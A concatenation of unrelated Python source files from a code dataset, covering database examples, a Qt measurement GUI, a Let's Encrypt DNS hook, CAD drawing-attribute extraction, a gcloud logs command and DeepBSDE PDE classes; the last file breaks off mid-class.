| 2.5625 | 3 |
nr_oai_pmh_harvester/error_handler.py | Narodni-repozitar/oai-pmh-harvester | 0 | 12761595 |
import traceback
from oarepo_oai_pmh_harvester.decorators import rule_error_handler
@rule_error_handler("uk", "xoai")
def call_error_handler_uk(el, path, phase, results):
error_handler(el, path, phase, results)
def error_handler(el, path, phase, results):
exc = traceback.format_exc()
if "rulesExceptions" not in results[-1]:
results[-1]["rulesExceptions"] = []
results[-1]["rulesExceptions"].append(
{"path": path, "element": str(el), "phase": phase, "exception": exc})
| 2.3125 | 2 |
DynamoDB/update_item.py | micheusch/sagemaker | 0 | 12761596 |
import boto3
dynamodb = boto3.resource('dynamodb', region_name='eu-west-2')
table = dynamodb.Table('Books')
# The UpdateItem API allows you to update a particular item as identified by its key.
resp = table.update_item(
Key={"Author": "<NAME>", "Title": "The Rainmaker"},
# Expression attribute names specify placeholders for attribute names to use in your update expressions.
ExpressionAttributeNames={
"#formats": "Formats",
"#audiobook": "Audiobook",
},
# Expression attribute values specify placeholders for attribute values to use in your update expressions.
ExpressionAttributeValues={
":id": "8WE3KPTP",
},
# UpdateExpression declares the updates you want to perform on your item.
# For more details about update expressions, see https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Expressions.UpdateExpressions.html
UpdateExpression="SET #formats.#audiobook = :id",
)
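# Hedged follow-up (same `table` handle; key values are placeholders): adding
# ReturnValues="UPDATED_NEW" makes DynamoDB echo the new value of every
# attribute the update expression touched.
#   resp = table.update_item(
#       Key={"Author": "Some Author", "Title": "Some Title"},
#       ExpressionAttributeNames={"#formats": "Formats", "#audiobook": "Audiobook"},
#       ExpressionAttributeValues={":id": "8WE3KPTP"},
#       UpdateExpression="SET #formats.#audiobook = :id",
#       ReturnValues="UPDATED_NEW",
#   )
#   print(resp["Attributes"])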
| 3.078125 | 3 |
mongodb/demo11.py | silianpan/seal-spider-demo | 0 | 12761597 | import pymongo
client = pymongo.MongoClient(host='localhost', port=27017)
db = client.test
collection = db.students
# Note: Collection.remove() was deprecated in PyMongo 3 and removed in
# PyMongo 4; delete_many() is the modern equivalent.
result = collection.delete_many({'name': 'Kevin'})
print(result.deleted_count) | 3 | 3 |
c_test_environment/c_index_strings.py | uwescience/raco | 61 | 12761598 |
import csv
import sys
#TODO take a schema as input
class WordIndexer:
def __init__(self, indexf):
self.words = {}
self.count = 0
self.indexfw = open(indexf, 'w')
def add_word(self, w):
if w in self.words:
return self.words[w]
else:
self.indexfw.write(w+'\n')
t = self.count
self.count += 1
self.words[w] = t
return t
def close(self):
self.indexfw.close()
def indexing(inputf, delim_in):
intfile = inputf + '.i'
indexf = inputf + '.index'
delim_out = ' '
wi = WordIndexer(indexf)
with open(inputf, 'r') as ins:
reader = csv.reader(ins, delimiter=delim_in)
with open(intfile, 'w') as outs:
writer = csv.writer(outs, delimiter=delim_out)
for row in reader:
cols = [wi.add_word(w) for w in row]
writer.writerow(cols)
wi.close()
return intfile, indexf
if __name__ == '__main__':
if len(sys.argv) < 2:
raise Exception("usage: %s inputfile [delim]" % sys.argv[0])
if len(sys.argv) == 3:
delim = sys.argv[2]
else:
delim = ' '
indexing(sys.argv[1], delim_in=delim)
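# Worked example (hedged; file names are illustrative): for a space-delimited
# 'edges.txt' containing
#   a b
#   b c
# indexing('edges.txt') writes 'edges.txt.i' with first-seen integer ids
#   0 1
#   1 2
# and 'edges.txt.index' listing one word per line: a, b, c.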
| 3.359375 | 3 |
src/core/uv_edit/helpers/__init__.py | Epihaius/panda3dstudio | 63 | 12761599 | from .grid import Grid
from .trnsf_gizmo import UVTransformGizmo
| 1.03125 | 1 |
ok.py | rahulneal/InterctiveMap | 0 | 12761600 |
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 27 22:16:29 2020
@author: ghanta
"""
my_dict={}
filepath = 'output.txt'
with open(filepath) as fp:
line = fp.readline()
cnt = 1
while line:
# print("Line {}: {}".format(cnt, line.strip()))
my_dict[str(line.strip())] = cnt
line = fp.readline()
cnt += 1
print(my_dict)
print("##################################")
def getList(my_dict):
return my_dict.keys()
# Driver program
print(getList(my_dict))
print(list(my_dict.keys()))  # materialise the keys view as a plain list
| 3.375 | 3 |
trionet/python/TN_TrionMeasure/tn_trion_measure_qt.py | DEWETRON/trion_sdk | 1 | 12761601 | #! /bin/env python3
# Copyright DEWETRON GmbH 2019
import sys
import time
sys.path.append('../../../trion_api/python')
# Import the core and GUI elements of Qt
from PySide2.QtCore import Qt, QObject, QPointF, QTimer, Slot, Signal, QThread
from PySide2 import QtGui
from PySide2.QtWidgets import *
from PySide2.QtCharts import *
from dewepxi_load import *
from dewepxi_apicore import *
from xml.etree import ElementTree as et
class MainDialog(QWidget):
"""
Sample main window
"""
def __init__(self, parent=None):
super(MainDialog, self).__init__(parent)
self.chart = QtCharts.QChart()
self.chart.setAnimationOptions(QtCharts.QChart.NoAnimation)
self.worker = TrionMeasurementWorker(self)
self.worker.signal_show_message.connect(self.showStatus, Qt.QueuedConnection)
self.worker.add_channel_data.connect(self.addChannelData, Qt.QueuedConnection)
self.chart_series = dict()
self.setupGUI()
self.redrawChart()
def setupGUI(self):
self.setWindowTitle("TRION Measure qt")
self.groupbox_api_selection = QGroupBox("&Select API", self)
self.api_trion_api = QRadioButton("&TRION", self)
self.api_trionet_api = QRadioButton("&TRIONet", self)
layout = QHBoxLayout()
layout.addWidget(self.api_trion_api)
layout.addWidget(self.api_trionet_api)
self.groupbox_api_selection.setLayout(layout)
self.groupbox_board_selection = QGroupBox("&Select Board", self)
self.cb_trion_board = QComboBox()
layout = QVBoxLayout()
layout.addWidget(self.cb_trion_board)
self.groupbox_board_selection.setLayout(layout)
self.groupbox_channel_selection = QGroupBox("&Select Channel", self)
self.cb_channel = QComboBox()
layout = QVBoxLayout()
layout.addWidget(self.cb_channel)
self.groupbox_channel_selection.setLayout(layout)
self.groupbox_channel_config = QGroupBox("&Channel Config", self)
self.cb_range = QComboBox()
self.cb_sample_rate = QComboBox()
layout = QHBoxLayout()
layout.addWidget(self.cb_range)
layout.addWidget(self.cb_sample_rate)
self.groupbox_channel_config.setLayout(layout)
self.statusbar = QStatusBar(self)
self.statuslabel = QLabel("Status", self)
self.statuslabel.setFrameStyle(QFrame.Panel | QFrame.Sunken)
self.statusbar.addPermanentWidget(self.statuslabel, 1)
groupbox_chart = QGroupBox("Channel Data", self)
self.chart_view = QtCharts.QChartView(self.chart)
self.chart_view.setRenderHint(QtGui.QPainter.Antialiasing)
self.chart_view.setMinimumSize(400, 200)
layout = QVBoxLayout()
layout.addWidget(self.chart_view)
groupbox_chart.setLayout(layout)
def onApiChanged():
if self.api_trion_api.isChecked():
self.worker.selectAPI("TRION")
elif self.api_trionet_api.isChecked():
self.worker.selectAPI("TRIONET")
self.api_trion_api.toggled.connect(onApiChanged)
self.api_trion_api.setChecked(True)
main_layout = QVBoxLayout()
main_layout.addWidget(self.groupbox_api_selection)
main_layout.addWidget(self.groupbox_board_selection)
main_layout.addWidget(self.groupbox_channel_selection)
main_layout.addWidget(self.groupbox_channel_config)
main_layout.addWidget(groupbox_chart)
main_layout.addWidget(self.statusbar)
self.setLayout(main_layout)
@Slot(str, str)
def showStatus(self, text, style = "color:black"):
"""
show text in status bar
"""
self.statuslabel.setText(text)
self.statuslabel.setStyleSheet(style)
def initChart(self):
self.chart.removeAllSeries()
for axis in self.chart.axes(Qt.Horizontal): self.chart.removeAxis(axis)
for axis in self.chart.axes(Qt.Vertical): self.chart.removeAxis(axis)
def redrawChart(self):
self.initChart()
def addChannelData(self, channel_data_list):
"""
Add new sample block
"""
self.chart.removeAllSeries()
series = QtCharts.QLineSeries()
series.append(channel_data_list)
self.chart.addSeries(series)
class TrionMeasurementWorker(QThread):
"""
Measurement worker thread
"""
signal_show_message = Signal(str, str)
add_channel_data = Signal(list)
def __init__(self, parent=None):
"""
constructor
"""
QThread.__init__(self, parent)
self.gui = parent
self.exiting = False
self.is_api_loaded = False
self.board_id = 0
def run(self):
"""
ACQ loop
"""
self.configureChannel()
self.configureAcquisition()
nReadPos = 0
nAvailSamples = 0
nRawData = 0
sample_index = 0
# Get detailed information about the ring buffer
# to be able to handle the wrap around
[nErrorCode, nBufEndPos] = DeWeGetParam_i64( self.board_id, CMD_BUFFER_END_POINTER)
[nErrorCode, nBufSize] = DeWeGetParam_i32( self.board_id, CMD_BUFFER_TOTAL_MEM_SIZE)
nErrorCode = DeWeSetParam_i32( self.board_id, CMD_START_ACQUISITION, 0)
        while not self.exiting:
# Get the number of samples already stored in the ring buffer
[nErrorCode, nAvailSamples] = DeWeGetParam_i32( self.board_id, CMD_BUFFER_AVAIL_NO_SAMPLE)
if nAvailSamples > 0:
# Get the current read pointer
[nErrorCode, nReadPos] = DeWeGetParam_i64( self.board_id, CMD_BUFFER_ACT_SAMPLE_POS)
channel_data = []
# Read the current samples from the ring buffer
for i in range(0, nAvailSamples):
# Get the sample value at the read pointer of the ring buffer
nRawData = DeWeGetSampleData(nReadPos)
# Print the sample value
# print(nRawData)
# sys.stdout.flush()
channel_data.append(QPointF(sample_index, nRawData))
sample_index += 1
# Increment the read pointer
nReadPos = nReadPos + 4
# Handle the ring buffer wrap around
if nReadPos > nBufEndPos:
nReadPos -= nBufSize
# Free the ring buffer after read of all values
nErrorCode = DeWeSetParam_i32( self.board_id, CMD_BUFFER_FREE_NO_SAMPLE, nAvailSamples)
self.addChannelData(channel_data)
# wait for 100ms
time.sleep(0.1)
nErrorCode = DeWeSetParam_i32( self.board_id, CMD_STOP_ACQUISITION, 0)
def startWorker(self):
"""
Start worker thread
"""
if not self.isRunning():
self.start()
def stopWorker(self):
"""
Stop worker thread
"""
if self.isRunning():
self.exiting = True
self.terminate()
def selectAPI(self, api_name):
"""
Select and load TRION or TRIONET api.
"""
self.stopWorker()
if self.is_api_loaded:
DeWeSetParam_i32(0, CMD_CLOSE_BOARD_ALL, 0)
DeWeDriverDeInit()
DeWePxiUnload()
if not DeWePxiLoad(api_name):
if api_name == "TRION":
self.showStatus("dwpxi_api.dll could not be found.")
if api_name == "TRIONET":
self.showStatus("dwpxi_netapi.dll could not be found.")
return
self.is_api_loaded = True
self.api_backend_name = api_name
self.initTrion()
self.startWorker()
def initTrion(self):
"""
Initialize TRION (or TRIONET)
"""
if self.isRunning():
self.showStatus("initTrion not possible with active worker thread")
return
[nErrorCode, nNoOfBoards] = DeWeDriverInit()
if abs(nNoOfBoards) == 0:
self.showStatus("No Trion cards found")
elif nNoOfBoards < 0:
self.showStatus("%d Trion cards found (Simulation)" % abs(nNoOfBoards))
else:
self.showStatus("%d Trion cards found" % nNoOfBoards)
self.gui.cb_trion_board.clear()
self.gui.cb_channel.clear()
num_boards = abs(nNoOfBoards)
if num_boards > 0:
nErrorCode = DeWeSetParam_i32(0, CMD_OPEN_BOARD_ALL, 0)
nErrorCode = DeWeSetParam_i32(0, CMD_RESET_BOARD_ALL, 0)
for i in range(num_boards):
[nErrorCode, board_name] = DeWeGetParamStruct_str("BoardID%d" % i, "BoardName")
if len(board_name) == 0:
board_name = "Unknown board"
self.gui.cb_trion_board.addItem("%d: %s " % ( i, board_name))
[nErrorCode, board_prop_xml] = DeWeGetParamStruct_str("BoardID%d" % i, "BoardProperties")
prop_doc = et.fromstring(board_prop_xml)
elem_list = prop_doc.findall("ChannelProperties/*")
for elem in elem_list:
if elem.tag != "XMLVersion":
# add channel names
self.gui.cb_channel.addItem(elem.tag)
def configureAcquisition(self):
"""
configure Acquisition setup
"""
# Set configuration to use one board in standalone operation
target = "BoardID%d/AcqProp" % self.board_id
nErrorCode = DeWeSetParamStruct_str( target, "OperationMode", "Slave")
nErrorCode = DeWeSetParamStruct_str( target, "ExtTrigger", "False")
nErrorCode = DeWeSetParamStruct_str( target, "ExtClk", "False")
nErrorCode = DeWeSetParam_i32(self.board_id, CMD_BUFFER_BLOCK_SIZE, 200)
nErrorCode = DeWeSetParam_i32(self.board_id, CMD_BUFFER_BLOCK_COUNT, 50)
nErrorCode = DeWeSetParam_i32(self.board_id, CMD_UPDATE_PARAM_ALL, 0)
def configureChannel(self):
"""
configureChannel
(has to be called before configureAcquisition)
"""
nErrorCode = DeWeSetParamStruct_str( "BoardID0/AIAll", "Used", "False")
nErrorCode = DeWeSetParamStruct_str( "BoardID0/AI0", "Used", "True")
def showStatus(self, text, style = "color:black"):
"""
show text in status bar
"""
self.signal_show_message.emit(text, style)
def addChannelData(self, channel_data):
"""
add samples to graph
"""
self.add_channel_data.emit(channel_data)
if __name__ == "__main__":
app = QApplication(sys.argv)
widget = MainDialog()
widget.show()
ret = app.exec_()
widget.worker.stopWorker()
sys.exit(ret)
| 1.835938 | 2 |
letsencrypt/validator.py | josiasjuniorx/letsencrypt_requester | 0 | 12761602 |
#! /usr/bin/python
# -*- coding: utf-8 -*-
import os, time, logging  # os is needed for the os.getenv calls below
from oper_status_json import *
from api_dns import *
from dns_query import *
from sys import argv
from etc.settings import schema_json, intervalo, max_retry, status_json_dir
chall_hash = os.getenv('CERTBOT_VALIDATION')
dominio = os.getenv('CERTBOT_DOMAIN')
chall_url = ("_acme-challenge.%s" % dominio)
dominio_raiz = retorna_root_domain(dominio)
status_path = argv[1]
logging.basicConfig(filename='/tmp/validator.log', level=logging.DEBUG)
def verify_hash(chall_hash, chall_url=chall_url):
logging.info('verificando hash: %s url: %s' % (chall_hash, chall_url))
status_json['nameservers'] = retorna_lista_ns(dominio)
return_hash = retorna_lista_txt(chall_url)
logging.info('hash encontrados no dns: %s' % (return_hash))
if chall_hash in return_hash:
status_json['entrada TXT atual'] = return_hash
write_status_json(status_json, json_file)
return True
else:
status_json['entrada TXT atual'] = return_hash
write_status_json(status_json, json_file)
return False
def hash_validation(status_json, json_file, chall_url=chall_url):
logging.info('hash validation...')
status_json['status'] = 'validando hash'
status_json['validando dominio'] = dominio
status_json[u'hash de validação'] = chall_hash
status_json['challenge url'] = chall_url
    status_json['tentativas'] = 0
    write_status_json(status_json, json_file)
    while not verify_hash(chall_hash) and status_json['tentativas'] < max_retry:
        time.sleep(intervalo)
        status_json['tentativas'] += 1
write_status_json(status_json, json_file)
if status_json['tentativas'] == max_retry:
status_json['status'] = 'max retry'
status_json['erro'] = 'atingido número máximo de tentativas'
write_status_json(status_json, json_file)
else:
status_json['status'] = 'verificação concluída'
write_status_json(status_json, json_file)
del_status_json('entrada TXT atual', json_file)
del_status_json('tentativas', json_file)
del_status_json(u'hash de validação', json_file)
del_status_json(u'nameservers', json_file)
del_status_json('challenge url', json_file)
del_status_json('validando dominio', json_file)
if __name__ == '__main__':
json_file = create_file(status_path, schema_json, status_json_dir)
logging.info("""iniciando o validator\n
dominio: %s
dominio_raiz: %s
chall_hash: %s
chall_url: %s
json_file: %s
""" % (dominio, dominio_raiz, chall_hash, chall_url, json_file))
status_json = read_status_json(json_file)
status_json['status'] = 'Criando entrada no DNS'
write_status_json(status_json, json_file)
create_dns_hash = criar_entrada(dominio_raiz, chall_url, 'txt', chall_hash)
logging.info('criando entrada dns %s' % create_dns_hash['mensagem'])
status_json['criação da entrada no dns'] = create_dns_hash['mensagem']
logging.info('escrevendo no arquivo: %s' % json_file)
write_status_json(status_json, json_file)
hash_validation(status_json, json_file)
| 2.25 | 2 |
custom_csv.py | jbenjoseph/GitGeo | 11 | 12761603 |
"""Custom CSV-related functionality."""
# pylint: disable=too-many-arguments, bad-continuation
import csv
import os
def create_csv(results_type, timestamp):
"""Create new csv to store GitGeo results.
Delete any existing csv and the create new csv.
Args:
results_type - a string indicating by contributor or by country
timestamp - datetime to create unique file name
Returns:
None
"""
filename = os.path.join("results", results_type + "_" + timestamp + ".csv")
# Create new csv file with column names
with open(filename, "w", encoding="utf-8", newline="") as file:
fieldnames = ["software_name", "username", "location", "country"]
writer = csv.DictWriter(file, fieldnames=fieldnames)
writer.writeheader()
def add_committer_to_csv(
results_type, software_name, timestamp, username, location, country
):
"""Write committer info to existing csv file.
Use to create dataset of location data for analysis.
Args:
results_type - a string indicating by contributor or by country
software_name - package name or github name
timestamp - datetime to append to unique existing file
username - GitHub username
location - Geographic info from GitHub profile
country - country predicted by GitGeo
Returns:
        None
"""
# replace slashes to avoid incorrect creation of directories
software_name = software_name.replace("/", "_")
filename = os.path.join("results", results_type + "_" + timestamp + ".csv")
# newline='' prevents spaces in between entries. Setting encoding to utf-8
# ensures that most (all?) characters can be read. "a" is for append.
with open(filename, "a", encoding="utf-8", newline="") as file:
fieldnames = ["software_name", "username", "location", "country"]
writer = csv.DictWriter(file, fieldnames=fieldnames)
writer.writerow(
{
"software_name": software_name,
"username": username,
"location": location,
"country": country,
}
)
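# --- Hedged usage sketch (timestamp format and values are assumptions) ---
#   from datetime import datetime
#   ts = datetime.now().strftime("%Y%m%d%H%M%S")
#   create_csv("contributors", ts)        # assumes a 'results/' directory exists
#   add_committer_to_csv("contributors", "requests", ts,
#                        "someuser", "Berlin, Germany", "Germany")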
| 3.109375 | 3 |
GetDocumentsAttribByPathForIzv.py | PKEv/ScriptsForKompas3D | 0 | 12761604 | import os
import re
import subprocess
import pythoncom
from win32com.client import Dispatch, gencache
from tkinter import Tk
# from tkinter.filedialog import askopenfilenames
from tkinter import filedialog
# Connect to the KOMPAS 3D API7 interface
def get_kompas_api7():
module = gencache.EnsureModule("{69AC2981-37C0-4379-84FD-5DD2F3C0A520}", 0, 1, 0)
api = module.IKompasAPIObject(
Dispatch("Kompas.Application.7")._oleobj_.QueryInterface(module.IKompasAPIObject.CLSID,
pythoncom.IID_IDispatch))
const = gencache.EnsureModule("{75C9F5D0-B5B8-4526-8681-9903C567D2ED}", 0, 1, 0).constants
return module, api, const
# Check whether KOMPAS 3D is currently running
def is_running():
proc_list = \
subprocess.Popen('tasklist /NH /FI "IMAGENAME eq KOMPAS*"', shell=False, stdout=subprocess.PIPE).communicate()[0]
return True if proc_list else False
# Count how many sheets of each format the document has
def amount_sheet(doc7):
sheets = {"A0": 0, "A1": 0, "A2": 0, "A3": 0, "A4": 0, "A5": 0}
for sheet in range(doc7.LayoutSheets.Count):
        format = doc7.LayoutSheets.Item(sheet).Format  # sheet is the zero-based sheet index
sheets["A" + str(format.Format)] += 1 * format.FormatMultiplicity
return sheets
# Read the drawing's title block (stamp)
def stamp(doc7):
for sheet in range(doc7.LayoutSheets.Count):
style_filename = os.path.basename(doc7.LayoutSheets.Item(sheet).LayoutLibraryFileName)
style_number = int(doc7.LayoutSheets.Item(sheet).LayoutStyleNumber)
if style_filename.lower() == 'graphic.lyt' and style_number in [1, 3]:
stamp = doc7.LayoutSheets.Item(sheet).Stamp
return {"Scale": re.findall(r"\d+:\d+", stamp.Text(6).Str)[0],
"FirstUsage": stamp.Text(25).Str, # Первичное применение
"Checked": stamp.Text(111).Str,
"TChecked": stamp.Text(112).Str,
"NChecked": stamp.Text(114).Str,
"Approved": stamp.Text(115).Str, # Утвердил
"Number": stamp.Text(2).Str, # Номер документа
"Material": stamp.Text(3).Str, # Материал
"Designer": stamp.Text(110).Str}
# Форматка для перечней элементов
elif style_filename.lower() == 'eskw_gr.lyt' and style_number == 60:
stamp = doc7.LayoutSheets.Item(sheet).Stamp
return {"Scale": re.findall(r"\d+:\d+", stamp.Text(6).Str)[0],
"FirstUsage": stamp.Text(25).Str, # Первичное применение
"Checked": stamp.Text(111).Str,
"TChecked": stamp.Text(112).Str,
"NChecked": stamp.Text(114).Str,
"Approved": stamp.Text(115).Str, # Утвердил
"Number": stamp.Text(2).Str, # Номер документа
"Material": stamp.Text(3).Str, # Материал
"Designer": stamp.Text(110).Str}
elif style_filename.lower() == 'graphic.lyt' and style_number in [17, 51]:
stamp = doc7.LayoutSheets.Item(sheet).Stamp # обработка спецификаций и групповых спецификаций
return {
"FirstUsage": stamp.Text(25).Str, # Первичное применение
"Checked": stamp.Text(111).Str,
"TChecked": stamp.Text(112).Str,
"NChecked": stamp.Text(114).Str,
"Approved": stamp.Text(115).Str, # Утвердил
"Number": stamp.Text(2).Str, # Номер документа
# "Material": stamp.Text(3).Str, # Материал
"Designer": stamp.Text(110).Str}
return {}
def specWork(doc7, module7):
    # Unfinished helper, apparently never called: module7 must be supplied by
    # the caller (from get_kompas_api7()), since it is not defined at module level.
    IDrawingDocument = doc7._oleobj_.QueryInterface(module7.NamesToIIDMap['IDrawingDocument'], pythoncom.IID_IDispatch)
    return IDrawingDocument
def parse_design_documents(paths):
    is_run = is_running()  # True if KOMPAS is already running
    module7, api7, const7 = get_kompas_api7()  # Connect to the application
    app7 = api7.Application  # Get the application's main interface
    app7.Visible = True  # Show the window to the user (if hidden)
    app7.HideMessage = const7.ksHideMessageNo  # Answer NO to any prompts from the application
    table = []  # Create the table of parameters
    for path in paths:
        print("Reading file: " + path + "\n")
        doc7 = app7.Documents.Open(PathName=path,
                                   Visible=False,
                                   ReadOnly=True)  # Open the file hidden and read-only
        row = amount_sheet(doc7)  # Count the number of sheets of each format
        row.update(stamp(doc7))  # Read the title block
        row.update({
            "Filename": doc7.Name,  # File name
        })
        table.append(row)  # Append the row of parameters to the table
        doc7.Close(const7.kdDoNotSaveChanges)  # Close the file without saving changes
    if not is_run: app7.Quit()  # Close the application if it was not already running
    return table
def getKeyFromDict(myDict, myKey):
    return myDict.get(myKey, "")
def print_to_excel(result):
    excel = Dispatch("Excel.Application")  # Connect to Excel
    excel.Visible = True  # Make the window visible
    wb = excel.Workbooks.Add()  # Add a new workbook
    sheet = wb.ActiveSheet  # Get a reference to the active worksheet
    # Create the table header
    sheet.Range("A1:Q1").value = ["File name", "Designer",
                                  "Checked by", "Tech. control", "Norm. control", "Approved by",
                                  "First application", "Decimal number", "Material",
                                  "Dimension count", "Tech. requirements count",
                                  "A0", "A1", "A2", "A3", "A4", "Scale"]
    # Fill the table
    for i, row in enumerate(result):
        sheet.Cells(i + 2, 1).value = row['Filename']
        sheet.Cells(i + 2, 2).value = getKeyFromDict(row, 'Designer')
        sheet.Cells(i + 2, 3).value = getKeyFromDict(row, 'Checked')
        sheet.Cells(i + 2, 4).value = getKeyFromDict(row, 'TChecked')
        sheet.Cells(i + 2, 5).value = getKeyFromDict(row, 'NChecked')
        sheet.Cells(i + 2, 6).value = getKeyFromDict(row, 'Approved')
        sheet.Cells(i + 2, 7).value = getKeyFromDict(row, 'FirstUsage')
        sheet.Cells(i + 2, 8).value = getKeyFromDict(row, 'Number')
        sheet.Cells(i + 2, 9).value = getKeyFromDict(row, 'Material')
        sheet.Cells(i + 2, 10).value = getKeyFromDict(row, 'CountDim')
        sheet.Cells(i + 2, 11).value = getKeyFromDict(row, 'CountTD')
        sheet.Cells(i + 2, 12).value = getKeyFromDict(row, 'A0')
        sheet.Cells(i + 2, 13).value = getKeyFromDict(row, 'A1')
        sheet.Cells(i + 2, 14).value = getKeyFromDict(row, 'A2')
        sheet.Cells(i + 2, 15).value = getKeyFromDict(row, 'A3')
        sheet.Cells(i + 2, 16).value = getKeyFromDict(row, 'A4')
        sheet.Cells(i + 2, 17).value = "".join(('="', row['Scale'], '"')) if 'Scale' in row else ""
def getFilesFromDir(dirName, listNames):
    names = os.listdir(dirName)
    for name in names:
        fullname = os.path.join(dirName, name).replace("\\", "/")  # build the full name
        ext = os.path.splitext(fullname)[1][1:]
        if os.path.isfile(fullname) and ext == "cdw":
            listNames.append(fullname)
        elif os.path.isdir(fullname):
            listNames = getFilesFromDir(fullname, listNames)
    return listNames
if __name__ == "__main__":
    root = Tk()
    root.withdraw()  # Hide the main window so only the file dialog is shown
    dirName = filedialog.askdirectory()
    print("Searching for files in directory " + dirName + "\n")
    listNames = []
    filenames = getFilesFromDir(dirName, listNames)
    # Exclude files located in 'old' directories
    filenames = [filename for filename in filenames if filename.find('/old/') == -1]
    table = []
    if len(filenames) != 0:
        table += parse_design_documents(filenames)
    else:
        print("No drawing files found")
    # Output the report
    print_to_excel(table)
    root.destroy()  # Destroy the main window
    root.mainloop()
| 2.09375 | 2 |
lib/surface/app/logs/read.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2 | 12761605 | # -*- coding: utf-8 -*- #
# Copyright 2015 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""app logs read command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.app import logs_util
from googlecloudsdk.api_lib.logging import common
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.app import flags
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
class Read(base.Command):
"""Reads log entries for the current App Engine app."""
@staticmethod
def Args(parser):
"""Register flags for this command."""
flags.SERVICE.AddToParser(parser)
flags.VERSION.AddToParser(parser)
flags.LEVEL.AddToParser(parser)
flags.LOGS.AddToParser(parser)
parser.add_argument('--limit', required=False, type=int,
default=200, help='Number of log entries to show.')
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Returns:
The list of log entries.
"""
printer = logs_util.LogPrinter()
printer.RegisterFormatter(logs_util.FormatRequestLogEntry)
printer.RegisterFormatter(logs_util.FormatNginxLogEntry)
printer.RegisterFormatter(logs_util.FormatAppEntry)
project = properties.VALUES.core.project.Get(required=True)
filters = logs_util.GetFilters(project, args.logs, args.service,
args.version, args.level)
lines = []
# pylint: disable=g-builtin-op, For the .keys() method
for entry in common.FetchLogs(log_filter=' AND '.join(filters),
order_by='DESC',
limit=args.limit):
lines.append(printer.Format(entry))
for line in reversed(lines):
log.out.Print(line)
Read.detailed_help = {
'DESCRIPTION': """\
Display the latest log entries from stdout, stderr and crash log for the
current Google App Engine app in a human readable format. This command
requires that the caller have the logging.logEntries.list
permission.
""",
'EXAMPLES': """\
To display the latest entries for the current app, run:
$ {command}
To show only the entries with severity at `warning` or higher, run:
$ {command} --level=warning
To show only the entries with a specific version, run:
$ {command} --version=v1
To show only the 10 latest log entries for the default service, run:
$ {command} --limit=10 --service=default
To show only the logs from the request log for standard apps, run:
$ {command} --logs=request_log
To show only the logs from the request log for Flex apps, run:
$ {command} --logs=nginx.request
""",
}
| 2.21875 | 2 |
equation.py | NYU-CDS-Capstone-FBSDE/DeepBSDE | 205 | 12761606 | <reponame>NYU-CDS-Capstone-FBSDE/DeepBSDE
import numpy as np
import tensorflow as tf
class Equation(object):
"""Base class for defining PDE related function."""
def __init__(self, eqn_config):
self.dim = eqn_config.dim
self.total_time = eqn_config.total_time
self.num_time_interval = eqn_config.num_time_interval
self.delta_t = self.total_time / self.num_time_interval
self.sqrt_delta_t = np.sqrt(self.delta_t)
self.y_init = None
def sample(self, num_sample):
"""Sample forward SDE."""
raise NotImplementedError
def f_tf(self, t, x, y, z):
"""Generator function in the PDE."""
raise NotImplementedError
def g_tf(self, t, x):
"""Terminal condition of the PDE."""
raise NotImplementedError
class HJBLQ(Equation):
"""HJB equation in PNAS paper doi.org/10.1073/pnas.1718942115"""
def __init__(self, eqn_config):
super(HJBLQ, self).__init__(eqn_config)
self.x_init = np.zeros(self.dim)
self.sigma = np.sqrt(2.0)
self.lambd = 1.0
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = x_sample[:, :, i] + self.sigma * dw_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
return -self.lambd * tf.reduce_sum(tf.square(z), 1, keepdims=True)
def g_tf(self, t, x):
return tf.math.log((1 + tf.reduce_sum(tf.square(x), 1, keepdims=True)) / 2)
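# Hedged usage sketch for HJBLQ: the constructor only reads dim, total_time and
# num_time_interval from eqn_config, so a SimpleNamespace stands in here for the
# real config object (an illustrative assumption):
#     import types
#     cfg = types.SimpleNamespace(dim=100, total_time=1.0, num_time_interval=20)
#     eqn = HJBLQ(cfg)
#     dw, x = eqn.sample(64)  # dw: (64, 100, 20), x: (64, 100, 21)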
class AllenCahn(Equation):
"""Allen-Cahn equation in PNAS paper doi.org/10.1073/pnas.1718942115"""
def __init__(self, eqn_config):
super(AllenCahn, self).__init__(eqn_config)
self.x_init = np.zeros(self.dim)
self.sigma = np.sqrt(2.0)
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = x_sample[:, :, i] + self.sigma * dw_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
return y - tf.pow(y, 3)
def g_tf(self, t, x):
return 0.5 / (1 + 0.2 * tf.reduce_sum(tf.square(x), 1, keepdims=True))
class PricingDefaultRisk(Equation):
"""
Nonlinear Black-Scholes equation with default risk in PNAS paper
doi.org/10.1073/pnas.1718942115
"""
def __init__(self, eqn_config):
super(PricingDefaultRisk, self).__init__(eqn_config)
self.x_init = np.ones(self.dim) * 100.0
self.sigma = 0.2
self.rate = 0.02 # interest rate R
self.delta = 2.0 / 3
self.gammah = 0.2
self.gammal = 0.02
self.mu_bar = 0.02
self.vh = 50.0
self.vl = 70.0
self.slope = (self.gammah - self.gammal) / (self.vh - self.vl)
def sample(self, num_sample):
